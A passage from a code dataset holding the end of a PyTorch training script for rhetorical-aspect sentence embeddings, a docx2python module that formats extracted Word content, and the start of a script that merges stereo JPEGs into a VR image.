progress_bar.update(1)\n completed_steps += 1\n\n if completed_steps >= args.max_train_steps:\n break\n\n \n if args.eval_steps is not None and completed_steps % args.eval_steps == 0:\n embeddings = []\n labels = []\n\n model.eval()\n for step, batch in enumerate(eval_dataloader):\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n 
embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n\n logger.info(f\"step {completed_steps}: {eval_metric}\")\n results_txt += f\"step {completed_steps}: {eval_metric}\\n\"\n\n # save model if it achieves new record\n if eval_metric[\"mean_average_precision_at_r\"] > current_record:\n accelerator.wait_for_everyone()\n unwrapped_model = accelerator.unwrap_model(model)\n accelerator.save(unwrapped_model.state_dict(), os.path.join(args.output_dir, f\"pytorch_model_step{completed_steps}.bin\"))\n current_record = eval_metric[\"mean_average_precision_at_r\"]\n current_record_epoch_or_step = completed_steps\n\n\n if args.eval_steps is not None:\n continue\n\n embeddings = []\n labels = []\n\n model.eval()\n for step, batch in enumerate(eval_dataloader):\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n\n logger.info(f\"epoch {epoch}: {eval_metric}\")\n results_txt += f\"epoch {epoch}: {eval_metric}\\n\"\n\n # save model if it achieves new record\n if eval_metric[\"mean_average_precision_at_r\"] > current_record:\n accelerator.wait_for_everyone()\n unwrapped_model = accelerator.unwrap_model(model)\n accelerator.save(unwrapped_model.state_dict(), os.path.join(args.output_dir, f\"pytorch_model_epoch{epoch}.bin\"))\n current_record = eval_metric[\"mean_average_precision_at_r\"]\n current_record_epoch_or_step = epoch\n\n\n if args.output_dir is not None:\n if args.eval_steps is not None:\n shutil.copyfile(\n os.path.join(args.output_dir, f\"pytorch_model_step{current_record_epoch_or_step}.bin\"), \n os.path.join(args.output_dir, f\"pytorch_model.bin\")\n )\n results_txt += f\"best step: {current_record_epoch_or_step}\\n\"\n\n # delete temporary models\n for step in range(args.max_train_steps):\n target_file = os.path.join(args.output_dir, f\"pytorch_model_step{step}.bin\")\n if os.path.isfile(target_file):\n os.remove(target_file)\n\n else:\n shutil.copyfile(\n os.path.join(args.output_dir, f\"pytorch_model_epoch{current_record_epoch_or_step}.bin\"), \n os.path.join(args.output_dir, f\"pytorch_model.bin\")\n )\n results_txt += f\"best epoch: {current_record_epoch_or_step}\\n\"\n\n # delete temporary models\n for epoch in range(args.num_train_epochs):\n target_file = os.path.join(args.output_dir, f\"pytorch_model_epoch{epoch}.bin\")\n if os.path.isfile(target_file):\n os.remove(target_file)\n\n if accelerator.is_main_process:\n unwrapped_model.config.save_pretrained(args.output_dir)\n tokenizer.save_pretrained(args.output_dir)\n\n with open(os.path.join(args.output_dir, \"results.txt\"), \"w\", encoding=\"utf-8\") as f:\n f.write(results_txt)\n\n\nif 
__name__ == \"__main__\":\n args = args.parse_args()\n main(args)", "repo_name": "kaisugi/rhetorical_aspect_embeddings", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 18516, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "modules.args.loss_type", "line_number": 44, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 44, "usage_type": "name"}, {"api_name": "modules.models.BertClsSoftmaxCrossEntropyLoss", "line_number": 45, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 46, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 50, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 50, "usage_type": "name"}, {"api_name": "modules.models.BertClsArcFaceLoss", "line_number": 51, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 52, "usage_type": "name"}, {"api_name": "modules.args.margin", "line_number": 54, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 54, "usage_type": "name"}, {"api_name": "modules.args.scale", "line_number": 55, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 55, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 58, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 58, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 59, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 60, "usage_type": "name"}, {"api_name": "modules.models.TripletMarginLoss", "line_number": 62, "usage_type": "call"}, {"api_name": "modules.args.margin", "line_number": 63, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 63, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 67, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 68, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 69, "usage_type": "name"}, {"api_name": "modules.models.MultiSimilarityLoss", "line_number": 71, "usage_type": "call"}, {"api_name": "modules.args.alpha", "line_number": 72, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 72, "usage_type": "name"}, {"api_name": "modules.args.beta", "line_number": 73, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 73, "usage_type": "name"}, {"api_name": "modules.args.base", "line_number": 74, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 74, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 77, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 77, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 78, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 79, 
"usage_type": "name"}, {"api_name": "modules.models.NTXentLoss", "line_number": 81, "usage_type": "call"}, {"api_name": "modules.args.temperature", "line_number": 82, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 82, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 86, "usage_type": "call"}, {"api_name": "accelerate.Accelerator", "line_number": 92, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 94, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 97, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 103, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 103, "usage_type": "attribute"}, {"api_name": "datasets.utils.logging.set_verbosity_warning", "line_number": 105, "usage_type": "call"}, {"api_name": "datasets.utils", "line_number": 105, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.set_verbosity_info", "line_number": 106, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 106, "usage_type": "attribute"}, {"api_name": "datasets.utils.logging.set_verbosity_error", "line_number": 108, "usage_type": "call"}, {"api_name": "datasets.utils", "line_number": 108, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.set_verbosity_error", "line_number": 109, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 109, "usage_type": "attribute"}, {"api_name": "modules.args.seed", "line_number": 112, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 112, "usage_type": "name"}, {"api_name": "transformers.set_seed", "line_number": 113, "usage_type": "call"}, {"api_name": "modules.args.seed", "line_number": 113, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 113, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 117, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 117, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 118, "usage_type": "call"}, {"api_name": "modules.args.output_dir", "line_number": 118, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 118, "usage_type": "name"}, {"api_name": "modules.args.train_file", "line_number": 123, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 123, "usage_type": "name"}, {"api_name": "modules.args.train_file", "line_number": 124, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 124, "usage_type": "name"}, {"api_name": "modules.args.validation_file", "line_number": 125, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 125, "usage_type": "name"}, {"api_name": "modules.args.validation_file", "line_number": 126, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 126, "usage_type": "name"}, {"api_name": "datasets.load_dataset", "line_number": 128, "usage_type": "call"}, {"api_name": "modules.args.label_num", "line_number": 132, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 132, "usage_type": "name"}, {"api_name": "modules.args.label_num", "line_number": 133, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 133, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 146, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 146, "usage_type": "name"}, {"api_name": "modules.args.model_name_or_path", "line_number": 146, 
"usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 146, "usage_type": "name"}, {"api_name": "modules.args.use_slow_tokenizer", "line_number": 146, "usage_type": "attribute"}, {"api_name": "modules.args.pad_to_max_length", "line_number": 153, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 153, "usage_type": "name"}, {"api_name": "modules.args.max_length", "line_number": 160, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 160, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 185, "usage_type": "call"}, {"api_name": "modules.args.pad_to_max_length", "line_number": 189, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 189, "usage_type": "name"}, {"api_name": "transformers.default_data_collator", "line_number": 192, "usage_type": "name"}, {"api_name": "transformers.DataCollatorWithPadding", "line_number": 197, "usage_type": "call"}, {"api_name": "modules.args.loss_type", "line_number": 200, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 200, "usage_type": "name"}, {"api_name": "modules.args", "line_number": 201, "usage_type": "argument"}, {"api_name": "modules.args", "line_number": 203, "usage_type": "argument"}, {"api_name": "modules.args.m_per_class_sampler", "line_number": 208, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 208, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSampler", "line_number": 209, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_train_batch", "line_number": 211, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 211, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 212, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 212, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSampler", "line_number": 215, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_eval_batch", "line_number": 217, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 217, "usage_type": "name"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 218, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 218, "usage_type": "name"}, {"api_name": "modules.args.m_per_class_sampler_without_easy_positives", "line_number": 221, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 221, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSamplerWithoutEasyPostives", "line_number": 222, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_train_batch", "line_number": 225, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 225, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 226, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 226, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSamplerWithoutEasyPostives", "line_number": 229, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_eval_batch", "line_number": 232, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 232, "usage_type": "name"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 233, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 233, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 236, "usage_type": "call"}, 
{"api_name": "modules.args.per_device_train_batch_size", "line_number": 241, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 241, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 244, "usage_type": "call"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 249, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 249, "usage_type": "name"}, {"api_name": "modules.args.weight_decay", "line_number": 259, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 259, "usage_type": "name"}, {"api_name": "transformers.AdamW", "line_number": 266, "usage_type": "call"}, {"api_name": "modules.args.learning_rate", "line_number": 266, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 266, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 277, "usage_type": "call"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 277, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 277, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 279, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 279, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 279, "usage_type": "attribute"}, {"api_name": "transformers.get_scheduler", "line_number": 281, "usage_type": "call"}, {"api_name": "modules.args.lr_scheduler_type", "line_number": 282, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 282, "usage_type": "name"}, {"api_name": "modules.args.num_warmup_steps", "line_number": 284, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 284, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 285, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 285, "usage_type": "name"}, {"api_name": "modules.utils.AccuracyCalculator", "line_number": 288, "usage_type": "call"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 291, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 291, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 291, "usage_type": "attribute"}, {"api_name": "modules.args.num_train_epochs", "line_number": 295, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 295, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 296, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 296, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 298, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 298, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 299, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 299, "usage_type": "name"}, {"api_name": "tqdm.auto.tqdm", "line_number": 307, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 318, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 318, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 323, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 336, "usage_type": "call"}, {"api_name": "modules.args.max_train_steps", "line_number": 336, "usage_type": "attribute"}, 
{"api_name": "modules.args", "line_number": 336, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 339, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 339, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 351, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 351, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 362, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 362, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 365, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 365, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 372, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 372, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 376, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 376, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 386, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 386, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 391, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path", "line_number": 405, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 405, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 405, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 410, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 410, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 422, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 422, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 426, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 427, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 441, "usage_type": "call"}, {"api_name": "os.path", "line_number": 441, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 441, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 441, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 446, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 446, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 447, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 447, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 448, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 449, "usage_type": "call"}, {"api_name": "os.path", "line_number": 449, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 449, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 449, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 450, "usage_type": "call"}, {"api_name": "os.path", "line_number": 450, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 450, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 450, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 
455, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 455, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 456, "usage_type": "call"}, {"api_name": "os.path", "line_number": 456, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 456, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 456, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 458, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 461, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 462, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 462, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 462, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 463, "usage_type": "call"}, {"api_name": "os.path", "line_number": 463, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 463, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 463, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 468, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 468, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 469, "usage_type": "call"}, {"api_name": "os.path", "line_number": 469, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 469, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 469, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 470, "usage_type": "call"}, {"api_name": "os.path", "line_number": 470, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 471, "usage_type": "call"}, {"api_name": "modules.args.output_dir", "line_number": 474, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 474, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 475, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 475, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 477, "usage_type": "call"}, {"api_name": "os.path", "line_number": 477, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 477, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 477, "usage_type": "name"}, {"api_name": "modules.args", "line_number": 482, "usage_type": "name"}, {"api_name": "modules.args.parse_args", "line_number": 482, "usage_type": "call"}, {"api_name": "modules.args", "line_number": 483, "usage_type": "argument"}]}
+{"seq_id": "31144676018", "text": "#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\n\"\"\"Output format for extracted docx content.\n\n:author: Shay Hill\n:created: 7/5/2019\n\nHolds runs in a 5-deep nested list (paragraphs are lists of text runs [strings])::\n\n [ # tables\n [ # table\n [ # row\n [ # cell\n [ # paragraph\n \"run 1 \", # text run\n \"run 2 \", # text run\n \"run 3\" # text run\n ]\n ]\n ]\n ]\n ]\n\n_runs properties (e.g., ``header_runs``) return text in this format.\n\nAlso returns a 4-deep nested list (paragraphs are strings)::\n\n [ # tables\n [ # table\n [ # row\n [ # cell\n \"run 1 run 2 run 3\" # paragraph\n ]\n ]\n ]\n ]\n\nThis is the format for default (no trailing \"_runs\", e.g ``header``) properties.\n\n\"\"\"\nfrom copy import deepcopy\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, Optional\nfrom warnings import warn\n\nfrom .docx_context import collect_docProps\nfrom .docx_reader import DocxReader\nfrom .docx_text import TablesList\nfrom .iterators import enum_at_depth, get_html_map, iter_at_depth\n\n\n@dataclass\nclass DocxContent:\n \"\"\"Holds return values for docx content.\"\"\"\n\n docx_reader: DocxReader\n docx2python_kwargs: Dict[str, Any]\n\n def __getattr__(self, item) -> Any:\n \"\"\"\n Create depth-four paragraph tables form depth-five run tables.\n\n :param item:\n :return:\n\n Docx2Python v1 joined runs into paragraphs earlier in the code. Docx2Python v2\n exposes runs to the user, but still returns paragraphs by default.\n \"\"\"\n if item in {\"header\", \"footer\", \"body\", \"footnotes\", \"endnotes\"}:\n runs = deepcopy(getattr(self, item + \"_runs\"))\n for (i, j, k, l), paragraph in enum_at_depth(runs, 4):\n runs[i][j][k][l] = \"\".join(paragraph)\n return runs\n raise AttributeError(f\"no attribute {item}\")\n\n def _get_runs(self, type_: str) -> TablesList:\n content = []\n for file in self.docx_reader.files_of_type(type_):\n content += file.content\n return content\n\n @property\n def header_runs(self) -> TablesList:\n return self._get_runs(\"header\")\n\n @property\n def footer_runs(self) -> TablesList:\n return self._get_runs(\"footer\")\n\n @property\n def officeDocument_runs(self) -> TablesList:\n return self._get_runs(\"officeDocument\")\n\n @property\n def body_runs(self) -> TablesList:\n return self.officeDocument_runs\n\n @property\n def footnotes_runs(self) -> TablesList:\n return self._get_runs(\"footnotes\")\n\n @property\n def endnotes_runs(self) -> TablesList:\n return self._get_runs(\"endnotes\")\n\n @property\n def images(self) -> Dict[str, bytes]:\n return self.docx_reader.pull_image_files(\n self.docx2python_kwargs[\"image_folder\"]\n )\n\n @property\n def document(self) -> TablesList:\n \"\"\"All docx \"tables\" concatenated.\"\"\"\n return self.header + self.body + self.footer + self.footnotes + self.endnotes\n\n @property\n def document_runs(self) -> TablesList:\n \"\"\"All docx x_runs properties concatenated.\"\"\"\n return (\n self.header_runs\n + self.body_runs\n + self.footer_runs\n + self.footnotes_runs\n + self.endnotes_runs\n )\n\n @property\n def text(self) -> str:\n \"\"\"All docx paragraphs, \"\\n\\n\" delimited.\"\"\"\n if self.docx2python_kwargs[\"paragraph_styles\"] is True:\n # Paragraph descriptors have been inserted as the first run of each\n # paragraph. 
Take them out.\n pars = [\"\".join(x[1:]) for x in iter_at_depth(self.document_runs, 4)]\n return \"\\n\\n\".join(pars)\n return \"\\n\\n\".join(iter_at_depth(self.document, 4))\n\n @property\n def html_map(self) -> str:\n \"\"\"A visual mapping of docx content.\"\"\"\n return get_html_map(self.document)\n\n @property\n def properties(self) -> Dict[str, Optional[str]]:\n \"\"\"Document core-properties as a dictionary.\n\n Docx files created with Google docs won't have core-properties. If the file\n `core-properties` is missing, return an empty dict.\n \"\"\"\n warn(\n \"DocxContent.properties is deprecated and will be removed in some future \"\n \"version. Use DocxContent.core_properties.\",\n FutureWarning,\n )\n return self.core_properties\n\n # noinspection PyPep8Naming\n @property\n def core_properties(self) -> Dict[str, Optional[str]]:\n \"\"\"Document core-properties as a dictionary.\n\n Docx files created with Google docs won't have core-properties. If the file\n `core-properties` is missing, return an empty dict.\n \"\"\"\n try:\n docProps = next(iter(self.docx_reader.files_of_type(\"core-properties\")))\n return collect_docProps(docProps.root_element)\n except StopIteration:\n warn(\n \"Could not find core-properties file (should be in docProps/core.xml) \"\n \"in DOCX, so returning an empty core_properties dictionary. Docx files \"\n \"created in Google Docs do not have a core-properties file, so this \"\n \"may be expected.\"\n )\n return {}\n\n def save_images(self, image_folder: str) -> Dict[str, bytes]:\n return self.docx_reader.pull_image_files(image_folder)\n", "repo_name": "Saransh-13/Test_sum", "sub_path": "venv/Lib/site-packages/docx2python/docx_output.py", "file_name": "docx_output.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "docx_reader.DocxReader", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 57, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 70, "usage_type": "call"}, {"api_name": "iterators.enum_at_depth", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 59, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 76, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 83, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 87, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 91, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 95, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 99, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 103, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 113, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 118, "usage_type": "name"}, {"api_name": "iterators.iter_at_depth", "line_number": 134, "usage_type": "call"}, {"api_name": "iterators.iter_at_depth", "line_number": 136, "usage_type": "call"}, {"api_name": "iterators.get_html_map", "line_number": 141, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 150, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.Optional", 
"line_number": 144, "usage_type": "name"}, {"api_name": "docx_context.collect_docProps", "line_number": 167, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 177, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 52, "usage_type": "name"}]}
+{"seq_id": "10528575245", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport shutil\nimport base64\nfrom libxmp import XMPFiles, XMPMeta\n\n# Usage\nif len(sys.argv) < 5:\n print('[Usage]')\n print(' $ python {0} [Left image path] [Right image path] [Image width] [Image height]'.format(sys.argv[0]))\n print(' * The image type must be jpeg.')\n print(' * These images must be same width and height.')\n print(' * Output merged vr image file named {Left image file}.vr.jpg.')\n exit()\n\n# Arguments\nlimage_path = sys.argv[1]\nrimage_path = sys.argv[2]\nimage_width = int(sys.argv[3])\nimage_height = int(sys.argv[4])\nif not os.path.isfile(limage_path):\n print('Left image path ({0}) is not exists.'.format(limage_path))\n exit()\nif not os.path.isfile(rimage_path):\n print('Right image path ({0}) is not exists.'.format(rimage_path))\n exit()\n\n# Copy left image file\nlimage_dir = os.path.split(limage_path)[0]\nlimage_fname = os.path.splitext(os.path.split(limage_path)[1])[0]\nvrimage_path = os.path.join(limage_dir, limage_fname + '.vr.jpg')\nshutil.copyfile(limage_path, vrimage_path)\n\n# Load image's xmp\nvrimage_file = XMPFiles(file_path=vrimage_path, open_forupdate=True)\nlxmp = vrimage_file.get_xmp()\n#print(lxmp)\n\n# Google's namespace\nXMP_GIMAGE = 'http://ns.google.com/photos/1.0/image/'\nXMP_GPANO = 